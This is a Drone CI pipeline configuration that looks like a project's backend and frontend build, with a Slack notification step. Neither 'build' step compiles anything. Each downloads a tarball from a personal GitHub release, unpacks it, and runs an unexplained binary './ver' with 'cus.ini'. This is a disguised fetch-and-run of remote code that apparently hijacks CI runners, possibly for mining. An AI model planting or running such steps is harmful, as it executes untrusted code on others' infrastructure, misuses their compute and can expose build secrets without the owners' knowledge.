kind: pipeline
type: docker
name: backend

steps:
- name: build1
  image: golang
  commands:
  - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

---
kind: pipeline
type: docker
name: frontend

steps:
- name: build2
  image: node
  commands:
  - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

---
kind: pipeline
name: after

steps:
- name: notify
  image: plugins/slack
  settings:
    room: general
   

depends_on:
- backend
- frontend
